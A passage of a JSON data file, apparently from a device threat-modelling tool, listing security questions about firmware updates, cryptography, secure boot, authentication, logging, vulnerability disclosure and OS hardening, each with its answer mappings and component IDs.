settings","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I","S"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1188},"Severity":2}],"threatQuestions":[{"ID":"5e4b4f24-6c61-4f68-ad6f-4bbce2240a36","Name":"Updatable","Description":"","OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device provide the ability to update or patch the firmware?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"367b80cd-1b41-483b-a157-b143714b8af7"},{"ID":"04f0bcc3-540b-462a-985b-e327acaed25d","Name":"Risky cryptographic algorithm ","Description":"No use of custom encryption schemes, deprecated algorithms (DES, MD5, SHA1, etc.)","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use only secure, standardized, and approved cryptographic algorithms?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d"},{"ID":"f56819e0-d966-4cd7-a514-8c3f944e176c","Name":"Improper access control","Description":"","OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"Does the device implement and correctly perform access control on physical debug/test interfaces to check users\' authorization? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6"},{"ID":"bf172d28-de23-4b6f-b308-1d919e9f35a1","Name":"Internal assets exposed","Description":"","OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"[Has access control] Does the device, supporting multiple debug access levels, assign the right access level to internal assets?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"517b62dd-eea7-426e-82c6-2c458eed0aaf"},{"ID":"d0c8f335-4df1-4719-ad49-ac60573cc59d","Name":"Hardware Feature Restriction","Description":"Hardware functionality can be used to modify the memory or to observe physical side channels.","OptionType":1,"componentTypeID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","Question":"Does the device restrict access to software-controllable device functionality (e.g. power and clock management)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b"},{"ID":"835439f8-ce55-4a20-a448-4c2f62097869","Name":"Address Region Overlap","Description":"","OptionType":1,"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Question":"Does the device allow overlapping of address regions (possibly leading to bypassing of memory protection)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92"},{"ID":"9736c676-6bb8-4fb9-beae-9213ac40d95b","Name":"State Transition","Description":"E.g., an uncleared SRAM can expose information after a software reset.","OptionType":1,"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Question":"Does the device clear sensitive information when a power or debug state transition is performed?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"16ab50f4-dd94-43dd-8480-37cae5c61043"},{"ID":"0e873bd5-6e22-4a7d-82dd-98851bd9264e","Name":"Missing secure boot","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device implement a secure boot?","propertyID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5"},{"ID":"9b600522-8621-4f50-b71c-856efeb246cc","Name":"Missing immutable Root of Trust","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device has a immutable Root of Trust in hardware?","propertyID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6"},{"ID":"ca231237-0565-407d-a5f3-0f77f80a3c50","Name":"Improper boot order","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device boot the next stage only after the successful boot of the previous stage? ","propertyID":"eb678bc0-3ece-4937-bba3-03981c5759a4"},{"ID":"abc4b5fe-d936-41c8-9a8f-57c72c9bc3e1","Name":"TOCTOU attack","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Is code checked for validity and trust immediately before running the code (to reduce Time of Check to Time of Use attacks)?","propertyID":"f3697413-e4de-4572-90b1-8041e8ff9b67"},{"ID":"8ac90b2d-7494-47de-8cc9-7ccb6d627bd8","Name":"Boot Code Protection in RAM","Description":"","OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device protect boot code (from ROM) during execution in a volatile memory?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"885834f4-b8b6-485b-8690-6ac525dbb59d"},{"ID":"0e71f794-64d0-4aca-bbfd-3cc3593b8b5b","Name":"Less-secure downgrade","Description":"","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device\'s TLS version and configuration exclude less-secure algorithms? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b"},{"ID":"b7546823-207e-4dcd-a65f-75be3f1e8d4f","Name":"Weak block cipher mode","Description":"Deprecated block cipher modes, such as ECB or CBC, do not provide enough security.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"For symmetric algorithms using block ciphers, does the device use strong block cipher modes?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"518bbb50-aeee-4c87-95d1-8724a4dac569"},{"ID":"e8a6964f-fe95-49b9-8d5a-c1914691bb17","Name":"Appropriate parameters","Description":"For example, the encryption scheme may be good, but its parameters are not sufficient (AES-128 vs AES-256, ECC secp256 vs secp384).","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use up-to-date and appropriate parameters for cryptographic primitives?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"08377961-8f56-4b56-b684-331f77810f1d"},{"ID":"3519bc83-7b2b-4116-82fd-66a5b20479a0","Name":"Sufficient entropy","Description":"A strong source of entropy could be a True Random Number Generator (TRNG), human input, etc?\\\\nThe entropy is required for generating true random numbers or to use it as seed for a Cryptographically Secure RNG.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device provide a strong source of entropy?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"420f03a2-1ab7-4bc2-910d-4ea025518da2"},{"ID":"eca78a13-9d1c-47b1-8244-a4e2995ad0d6","Name":"Nonce reuse","Description":"IVs and nonces that are required by many cryptographic algorithms must be used only once and must be generated with high entropy, which is usually ensured by a true random number generator.","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use values for initialization vectors (IV) or nonces only once? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"f35ccff8-6497-4b28-8627-7f255bce0e02"},{"ID":"1f2d06c2-db63-4016-b138-417122111a2d","Name":"Roll-back","Description":"For practical reasons a downgrade is probably necessary, but security patches should not be reversible (e.g. by using special security version numbers).","OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device prevent a firmware downgrade (roll-back) to vulnerable versions?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"d951b792-f84b-4ab3-82d1-21867e202755"},{"ID":"ca8aa7ce-e87c-4468-be08-faf66bca1696","Name":"Hard-coded credentials","Description":"For example, does the software or hardware include fixed strings/keys for developer authentication (backdoor)?","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device use/contain hard-coded credentials? ","propertyID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}}},{"ID":"956f9950-0d28-4e4c-8831-8a99030ccafc","Name":"Default credentials","Description":"A common vulnerability are default credentials that can be found in the manual.","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device ship with default credentials?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"714ed1de-855c-491b-8a08-745a99e17413"},{"ID":"4c4a1184-5a53-41dd-8aba-3acb663f3b6b","Name":"Password requirements","Description":"Requirements to length, reuse, common passwords, expiration, etc?","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device enforce requirements to passwords?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"540e39da-3227-4e6c-86ea-32a017318511"},{"ID":"a64b3c96-c3d2-4976-a606-ae97652e2fa5","Name":"Multi-factor authentication","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device support multi-factor authentication?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"88763e20-7878-4525-81d8-c4d09b867042"},{"ID":"7aa200ee-17f1-4092-b6f9-7ef87c96dfb8","Name":"Restriction of attempts","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device restrict failed authentication attempts within a short time frame?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"aa74f499-b995-4f5e-8d92-91f3ca172743"},{"ID":"20146e1b-2de2-4b76-8482-7931a46f6090","Name":"Sensitive (authentication) information exposed","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does an authentication response contain information which requirement is not fulfilled (e.g. password/username is wrong)? ","propertyID":"157fd588-2ea2-4260-9a25-86bf8241b31c"},{"ID":"7a53e800-1166-466e-a5da-e7cbb1f53942","Name":"Session ID expiration","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device invalidate session identifiers (e.g. session ID) after a logout?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"51473250-3891-4342-a8b8-687db16ffef3"},{"ID":"46d4d08b-030e-41ce-b14e-eb6deb5140d5","Name":"Session timeout","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device invalidate a session after a period of inactivity?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"a21a6894-256f-4bfd-bd49-09352d054399"},{"ID":"b554922b-d912-427a-b1c9-e3da880038e1","Name":"Password recovery","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device implement a strong mechanism for password recovery after users forgot it?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d"},{"ID":"b22c80f8-01f7-491c-bb96-f76777bffa8f","Name":"Client-side hashing","Description":"","OptionType":1,"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Question":"Does the device use a password hash instead of password for authentication (client-side password hashing)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"ba8dc5f0-e1a9-4263-8179-747791b873ee"},{"ID":"ea4835f4-d40f-435b-b75c-e9e616f8337f","Name":"Hidden interfaces","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"Are the hidden interfaces that developers created with the intend to be not publicly available?","propertyID":"311904f3-7898-4bab-ba74-e6024c704cd3"},{"ID":"051f0ffa-a58b-4b1b-bd19-2f46b03417af","Name":"Integrity validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the update routine cryptographically validate the integrity of a software update package before the installation begins?","propertyID":"8f47a4ac-0934-4a65-a6f3-07503c92f658"},{"ID":"181a48c3-9e33-4620-b8eb-de8877caf188","Name":"Authenticity validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the update routine cryptographically validate the authenticity of a software update package before the installation begins?","propertyID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2"},{"ID":"04f1e766-95b6-4b93-9032-337ae1febdb9","Name":"TOCTOU attack","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device ensure that the package cannot be modified or replaced by an attacker between being validated and installed - a TOCTOU (Time of Check to Time of Use) attack?","propertyID":"000441ff-d15f-46c3-bb9c-0c949063271d"},{"ID":"75207b21-020d-4011-9d6e-9cba7f311ac7","Name":"Unknown state","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device implement a fail safe mechanism that will leave the system in a known safe state in the event of a failed update?","propertyID":"3df6a845-52a2-40a9-8978-0277efd7cfcb"},{"ID":"52f64789-fac1-47f7-927c-e2c33ca4567a","Name":"Improper log access control","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Is access to log files restricted to the minimum required rights to function properly?","propertyID":"8e4b2af8-b023-4991-80f5-54ffa28cd616"},{"ID":"0d4af18b-a202-44e5-b8a8-84c8ed7c6576","Name":"Missing separate location for log files","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are logs stored in their own partition, separate from other system files?","propertyID":"418fe90d-88fd-4066-9339-890501ea07f0"},{"ID":"2c3b6a86-04c2-4774-8fed-84178460bd05","Name":"Missing log rotation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Is there a maximum size for logs and is log rotating implemented?","propertyID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f"},{"ID":"90985455-d995-4b8f-93e4-559882304b7c","Name":"Log file overwritten","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are users notified when the log file reaches its maximum size?","propertyID":"95b793b3-b68f-4533-9dc0-4e7d414effe3"},{"ID":"d6d5e1bd-d8c2-4b0c-b85a-b7cd2c9190ed","Name":"Missing log evaluation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are logs regularly monitored and analyzed to extract valuable information and insight?","propertyID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa"},{"ID":"fe03b451-3259-4649-963f-569e6f2f426a","Name":"Regulation compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Do all logged data comply with prevailing data protection regulations?","propertyID":"4006de15-8767-4a09-8678-84b8d6b50ae0"},{"ID":"bcebb419-09f6-41b8-83b3-88923dcac369","Name":"Missing central log backup","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the device securely send logs to a central repository? ","propertyID":"bd32d10e-82d6-4e7f-9247-fe2753908e60"},{"ID":"9c9cdd06-f272-4a71-b83e-ad1d2cf0e9a8","Name":"Log files contain passwords","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the device log passwords?","propertyID":"025e828e-d1a0-4487-9c56-09fd6941d4b9"},{"ID":"65b66adb-05b4-440b-a9e5-30a615ac4e6f","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are authentication attempts logged?","propertyID":"c7d5fd7a-4007-480c-a34b-cb32fab17472"},{"ID":"30c55017-8b6b-4b0b-a591-ddf03e86ee37","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are user login, logout, and inactivity logged?","propertyID":"a154298a-d410-4da4-921d-906165cd5329"},{"ID":"eb07bd86-e1cf-4177-9531-4622c14e0997","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are privilege changes logged?","propertyID":"c86b6500-99cb-46e3-948f-b67b69c9768d"},{"ID":"6bf25a01-2d7e-4f4c-bd18-983b839560bc","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are user management changes logged?","propertyID":"1a582358-45c2-42e2-a21e-61206a4eda7e"},{"ID":"5a2d72ab-1079-4e09-8ded-18f4c1efcf29","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are changes to the firmware logged?","propertyID":"91abf825-cfca-4386-b5d5-8262423b090d"},{"ID":"03c2354d-f29f-4e56-ad13-8b996b7a0c8a","Name":"Missing public policy","Description":"The policy can be provided either in-house or through a third party.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Is there are publicly available vulnerability disclosure policy?","propertyID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d"},{"ID":"591d70ce-8b09-4beb-807a-7b9801e42ec2","Name":"Missing /security page","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the website of the manufacturer use /security to provide security-related topics?","propertyID":"36e1de4b-5129-470f-b06d-208ef7610da8"},{"ID":"1fff723c-b343-432b-a7e1-b5b7780bad03","Name":"Missing security.txt","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the website of the manufacturer provide a security.txt including all security-related sites and contact information?","propertyID":"3affc4da-9a78-43ec-990b-75d20edbc410"},{"ID":"aa359dc1-5ac3-469a-b61c-ce910221acdc","Name":"Missing contact email address","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the manufacturer provide an email account for security related topics?","propertyID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c"},{"ID":"b089383b-9c6b-46ac-b255-59da1c622afe","Name":"Missing PGP key","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Does the manufacturer provide a PGP on their website for secure communication?","propertyID":"61d4b9c9-19a9-431e-b114-f2c04b48846b"},{"ID":"8b63f920-3f9c-4a00-afba-7b3d328bfd56","Name":"Missing reporting system","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Question":"Is there a public vulnerability reporting system?","propertyID":"23943ca9-3df9-4d69-a414-6d8fef99d30c"},{"ID":"45134e98-27a6-4345-b5d2-1584920f9fa4","Name":"Missing timeline info","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there information on the timelines for acknowledgement and resolution of reported issues?","propertyID":"e7d90cc4-822e-4aab-a161-c766cf13df22"},{"ID":"f60997da-93c7-4b86-8ade-c6a8fa03cded","Name":"Missing bug bounty program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there a bug bounty program?","propertyID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4"},{"ID":"9a672303-34ad-48df-9ca0-11c64f057707","Name":"Non-disclosure","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Does the manufacturer enable a coordinated vulnerability disclosure?","propertyID":"dd2c4c41-45f0-4105-aea4-317943e2f435"},{"ID":"81a26318-6836-4280-a146-dbbd515733f2","Name":"Missing Firmware Encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Is the firmware update encrypted?","propertyID":"434d79b2-574c-4575-813b-19ec7854a139"},{"ID":"f797f4ac-1e25-4463-b77c-1a90e7ccdc6a","Name":"Unnecessary components","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Does the operating system only include components (libraries, modules, packages, ...) that are required to support the function of the device?","propertyID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50"},{"ID":"6f7a6386-8b2f-42cc-9433-8f8963362f66","Name":"Outdated OS version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the OS the latest available stable version?","propertyID":"4ba05121-485a-40eb-832a-f4095c7b88df"},{"ID":"d8245144-c203-40b8-8d62-ac822810381d","Name":"Secure configuration not default","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Does the device ship with the most secure configuration in place (security by default)?","propertyID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1"},{"ID":"a5b98b6e-be51-47ca-aeb8-975a5669d590","Name":"Missing component update process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is there a process to update OS components to the latest stable version throughout the lifetime of a deployed device?","propertyID":"36ed4680-0b94-42a9-9863-08eb976c9ebc"},{"ID":"c8caecc4-6cc7-4e60-9013-b7e4ef16a3c2","Name":"Activated services and ports","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Are all ports, protocols, and services that are not used deactivated?","propertyID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6"},{"ID":"6a468670-eb0a-416d-9e22-bac4fa377463","Name":"Improper permission configuration","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the access to the root file system restricted for users/applications?","propertyID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c"},{"ID":"d3df84cb-3ee1-4b90-9bdd-fa33d67ff0d0","Name":"Least privilege violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Have all files and directories the minimum required access rights (least privilege principal)?","propertyID":"7378780b-e280-4494-84f2-0beb4e7257ec"},{"ID":"e4a8a85e-77e2-41d5-85aa-1210083b4f6a","Name":"Missing file system encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Question":"Is the file system encrypted?","propertyID":"85e19877-51a0-4904-8e98-b2fb14be3922"},{"ID":"d1ed0929-25af-4c4f-9cbf-228d0a235e26","Name":"Least privilege violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Does the application operate at the lowest privilege level that is possible, with access only to resources needed (least privilege principal)?","propertyID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0"},{"ID":"333ea9fb-0f19-462d-a7af-0f15322b878c","Name":"Missing application isolation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Is the application isolated from others, e.g. using sandboxing techniques such as virtual machines, 